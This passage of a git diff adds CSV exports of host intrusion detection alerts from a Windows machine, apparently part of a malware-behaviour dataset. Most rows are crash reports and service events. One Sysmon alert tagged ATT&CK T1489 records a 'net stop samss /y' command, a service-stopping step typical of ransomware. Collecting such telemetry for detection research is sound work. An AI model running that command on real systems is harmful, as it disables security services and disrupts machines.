0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xd48 +Faulting application start time: 0x01d60cd5a8162dfe +Faulting application path: C:\Windows\system32\taskhostw.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: a1d1d7f5-0634-4dbb-80a1-aa95f13bff47 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:53.960",4,"Summary event of the report's signatures",,"""Fault bucket 1169745795226003087, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: SecurityHealthSystray.exe +P2: 10.0.18362.628 +P3: 765bdd03 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F6.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9920.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER997F.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER99DD.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A5B.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_SecurityHealthSy_90252a4db18aef6effabc3a136419b89f51c2f7f_28e80497_bf7b39a5-4db7-49aa-8af2-68b27279abc9 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: c17805f2-5d36-4b1e-b6ba-3c9a1789f571 +Report Status: 268435456 +Hashed bucket: 545dc7a61a4342f5d03bc59a69f3e68f +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:51.558",4,"Summary event of the report's signatures",,"""Fault bucket 1837995919748689722, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: SecurityHealthSystray.exe +P2: 10.0.18362.628 +P3: 765BDD03 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH9722.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9732.tmp.WERInternalMetadata.xml 
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9743.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER9799.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F8.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: ad316566-04ff-4b04-acbb-58a0ee47767c +Report Status: 268435456 +Hashed bucket: c340295b095a416b1981df8d073cef3a +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:50.322",5,"Windows Push Notifications User Service_3d061 terminated unexpectedly",,"""The Windows Push Notifications User Service_3d061 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:09:50.310",5,"Sync Host_3d061 terminated unexpectedly",,"""The Sync Host_3d061 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:09:50.292",5,"Connected Devices Platform User Service_3d061 terminated unexpectedly",,"""The Connected Devices Platform User Service_3d061 service terminated unexpectedly. It has done this 1 time(s). 
The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:09:50.089",9,"Windows Application error event",,"""Faulting application name: SecurityHealthSystray.exe, version: 10.0.18362.628, time stamp: 0x765bdd03 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1598 +Faulting application start time: 0x01d60cd5b3aa9a13 +Faulting application path: C:\Windows\System32\SecurityHealthSystray.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: c17805f2-5d36-4b1e-b6ba-3c9a1789f571 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:49.173",4,"Summary event of the report's signatures",,"""Fault bucket 1712032597060996587, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: StackHash_1e37 +P5: 0.0.0.0 +P6: 00000000 +P7: c0000005 +P8: PCH_39_FROM_unknown+0x0000000000000000 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8103.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER84EC.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER857A.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER85A5.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8633.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_98a97f67fb786bddb4f2e540a9ad544d69dd3fb_a3c514cf_94055a69-e3e0-43c5-a21e-1417a7b1c986 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 220120c4-87a3-4127-9d1c-2865b5bdc4ab +Report Status: 268435456 +Hashed bucket: 465c10de1bbb5ea477c25c9387b5cdeb +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:43.192",10,"Multiple Windows error Application events",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, 
time stamp: 0x32d6c210 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff6abb7e38d +Faulting process id: 0xcf0 +Faulting application start time: 0x01d60cd5a80a4d4d +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: unknown +Report Id: 220120c4-87a3-4127-9d1c-2865b5bdc4ab +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:41.938",12,"Sysmon - Suspicious Process - explorer.exe","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-07T12:15:49.785616700Z"",""eventRecordID"":""520"",""processID"":""2092"",""threadID"":""1004"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-04-07 12:15:49.780\r\nProcessGuid: {df9fc3d3-6ef5-5e8c-0000-0010d1821a00}\r\nProcessId: 41912\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: explorer.exe /LOADSAVEDWINDOWS\r\nCurrentDirectory: C:\\Windows\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-6de9-5e8c-0000-0020b0500300}\r\nLogonId: 0x350B0\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452\r\nParentProcessGuid: {df9fc3d3-6ee1-5e8c-0000-001091d01500}\r\nParentProcessId: 832\r\nParentImage: C:\\Windows\\System32\\sihost.exe\r\nParentCommandLine: 
sihost.exe\""""},""eventdata"":{""utcTime"":""2020-04-07 12:15:49.780"",""processGuid"":""{df9fc3d3-6ef5-5e8c-0000-0010d1821a00}"",""processId"":""41912"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""explorer.exe /LOADSAVEDWINDOWS"",""currentDirectory"":""C:\\\\Windows\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-6de9-5e8c-0000-0020b0500300}"",""logonId"":""0x350b0"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-6ee1-5e8c-0000-001091d01500}"",""parentProcessId"":""832"",""parentImage"":""C:\\\\Windows\\\\System32\\\\sihost.exe"",""parentCommandLine"":""sihost.exe""}}}","""Process Create: +RuleName: +UtcTime: 2020-04-07 12:15:49.780 +ProcessGuid: {df9fc3d3-6ef5-5e8c-0000-0010d1821a00} +ProcessId: 41912 +Image: C:\Windows\explorer.exe +FileVersion: 10.0.18362.693 (WinBuild.160101.0800) +Description: Windows Explorer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: EXPLORER.EXE +CommandLine: explorer.exe /LOADSAVEDWINDOWS +CurrentDirectory: C:\Windows\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-6de9-5e8c-0000-0020b0500300} +LogonId: 0x350B0 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452 +ParentProcessGuid: {df9fc3d3-6ee1-5e8c-0000-001091d01500} +ParentProcessId: 832 +ParentImage: C:\Windows\System32\sihost.exe +ParentCommandLine: sihost.exe""" +"Apr 26, 2020 @ 
10:09:34.759",9,"Windows Application error event",,"""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """ +"Apr 26, 2020 @ 10:09:28.101",4,"Summary event of the report's signatures",,"""Fault bucket 1637491510777227696, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.SkypeApp_14.56.102.0_x64__kzf8qxf38zg5c +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C2A.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D64.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D94.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DAD.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DCE.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.SkypeA_7d2a408828e065e1d27872d29be5ccc5e9fa361_ca0f241c_da730706-783c-4686-b50c-8c35f0eb4b42 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: ee5d5106-dbaf-4353-a899-4a4e9a27e48e +Report Status: 268435456 +Hashed bucket: 2a13a40d9a75141906b989da6e9829b0 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:27.951",4,"Summary event of the report's signatures",,"""Fault bucket 1622308077343013045, type 5 +Event Name: BEX +Response: Not available +Cab Id: 0 + +Problem signature: +P1: OneDrive.exe +P2: 19.232.1124.10 +P3: 1482ea94 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 832e7bce +P7: 00088d30 +P8: c0000409 +P9: 0000000a +P10: + +Attached files: +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceCurrent.1124.0010.etl +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceArchive.1124.0010-6.etl 
+\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceArchive.1124.0010-5.etl +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceArchive.1124.0010-4.etl +\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2020-04-07.1211.5628.1.aodl +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B81.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3025.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3055.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER305B.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER307B.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_OneDrive.exe_5f9f888f92a070788b9455eacf35150c2a872_07f528d8_6a4c5d64-4f98-4340-a720-6b51fe3e6e42 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 435be01d-fb68-4058-bcfb-f53f9416b141 +Report Status: 268435456 +Hashed bucket: c88d0b45f49ff7ddf6839899da46f8b5 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:27.585",4,"Summary event of the report's signatures",,"""Fault bucket 1249619647368064933, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: RuntimeBroker.exe +P2: 10.0.18362.1 +P3: 4539D5A0 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH3B82.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B92.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BB2.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BB7.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BD8.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: d1c2bca4-be56-42df-bf32-230401d57409 +Report Status: 268435456 +Hashed bucket: 83ecd02fadfbabe731578a72d1b8efa5 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:26.633",9,"Windows 
Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x16b8 +Faulting application start time: 0x01d60cd5b615e093 +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: ee5d5106-dbaf-4353-a899-4a4e9a27e48e +Faulting package full name: Microsoft.SkypeApp_14.56.102.0_x64__kzf8qxf38zg5c +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:09:25.382",4,"Summary event of the report's signatures",,"""Fault bucket 1628525208398105851, type 5 +Event Name: BEX +Response: Not available +Cab Id: 0 + +Problem signature: +P1: jusched.exe +P2: 2.8.241.7 +P3: 5df0d8be +P4: StackHash_2beb +P5: 0.0.0.0 +P6: 00000000 +P7: PCH_99_FROM_ntdll+0x0007232C +P8: c0000005 +P9: 00000008 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A68.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B34.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B64.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B77.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BB7.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_jusched.exe_703a93d08f7f799457d455bc4862c84c171f42b9_f38fb822_e892e926-2853-4648-ad5b-78a63211e1a3 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 2f9d87e6-0632-4766-852f-a780ecc6d6af +Report Status: 268435456 +Hashed bucket: 752e0991a4afff7d6699af0c7a568cfb +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:25.272",4,"Summary event of the report's signatures",,"""Fault bucket 2039954016612560073, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: 
Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +P2: praid:App +P3: 0.0.0.0 +P4: 5d65fb6a +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER216F.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER23A2.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2420.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER251C.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER26B3.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_a517d33c7366c0ce7a4123d7394238d757255f3_df0fc392_4b200961-6f50-4dc4-834a-444a179b5427 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: d1fd5c88-53ca-4622-b3e0-302591f2c16f +Report Status: 268435456 +Hashed bucket: 28406508ca41bd6f7c4f5f5eb652acc9 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:22.304",9,"Windows Application error event",,"""Faulting application name: jusched.exe, version: 2.8.241.7, time stamp: 0x5df0d8be +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0xabb74484 +Faulting process id: 0x16e8 +Faulting application start time: 0x01d60cd5b64f1ef2 +Faulting application path: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe +Faulting module path: unknown +Report Id: 2f9d87e6-0632-4766-852f-a780ecc6d6af +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:22.289",4,"Summary event of the report's signatures",,"""Fault bucket 2258116575438203359, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: StartMenuExperienceHost.exe +P2: 0.0.0.0 +P3: 5D65FB6A +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH2007.tmp\fthempty.txt 
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2008.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2057.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2067.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2078.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: a99f24b9-29ac-45cc-aa2d-2f5628aa0af5 +Report Status: 268435456 +Hashed bucket: ea03c7813111befe0f56710fb46a69df +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:20.836",4,"Summary event of the report's signatures",,"""Fault bucket 1416303988536420219, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: sihost.exe +P2: 10.0.18362.1 +P3: e9587576 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER18A5.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A9A.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1ACA.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AE7.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B36.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_sihost.exe_8e8a7b3a9516eb3355c5fecfc9f15289a25db9f_b8434f32_80ed8f93-bf6c-4b7e-926c-1dcbd5c2ae28 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 581f868a-0357-4466-a2e8-74c009a3bf02 +Report Status: 268435456 +Hashed bucket: 2530936a9b385b37a3a7b8f942aea77b +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:20.414",9,"Windows Application error event",,"""Faulting application name: OneDrive.exe, version: 19.232.1124.10, time stamp: 0x1482ea94 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000409 +Fault offset: 0x00088d30 +Faulting process id: 0x15fc +Faulting application start time: 0x01d60cd5b4099e08 +Faulting application path: 
C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\OneDrive.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 435be01d-fb68-4058-bcfb-f53f9416b141 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:19.685",9,"Windows Application error event",,"""Faulting application name: StartMenuExperienceHost.exe, version: 0.0.0.0, time stamp: 0x5d65fb6a +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1190 +Faulting application start time: 0x01d60cd5ab65f758 +Faulting application path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: d1fd5c88-53ca-4622-b3e0-302591f2c16f +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:09:18.832",9,"Windows Application error event",,"""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """ +"Apr 26, 2020 @ 10:09:18.380",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 26, 2020 @ 10:09:17.554",9,"Windows Application error event",,"""Faulting application name: sihost.exe, version: 10.0.18362.1, time stamp: 0xe9587576
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
+Exception code: 0xc0000005
+Fault offset: 0x000000000003b890
+Faulting process id: 0xcdc
+Faulting application start time: 0x01d60cd5a8027622
+Faulting application path: C:\Windows\system32\sihost.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 581f868a-0357-4466-a2e8-74c009a3bf02
+Faulting package full name:
+Faulting package-relative application ID: """
+"Apr 26, 2020 @ 10:09:15.367",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start."""
+"Apr 26, 2020 @ 10:09:13.882",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",,
+"Apr 26, 2020 @ 10:09:10.632",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",,
diff --git a/data/MW_18_HIDS_3.csv b/data/MW_18_HIDS_3.csv
new file mode 100644
index 0000000..3195f61
--- /dev/null
+++ b/data/MW_18_HIDS_3.csv
@@ -0,0 +1,3540 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 23, 2020 @ 12:47:22.533",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:47:20.966 +ProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010e81a2f00} +ProcessId: 344552 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b58-5ec9-0000-00107b162f00} +ParentProcessId: 344360 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:47:20.968012700Z"",""eventRecordID"":""1737"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:47:20.966\r\nProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010e81a2f00}\r\nProcessId: 344552\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: 
Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b58-5ec9-0000-00107b162f00}\r\nParentProcessId: 344360\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:47:20.966"",""processGuid"":""{df9fc3d3-1b58-5ec9-0000-0010e81a2f00}"",""processId"":""344552"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John 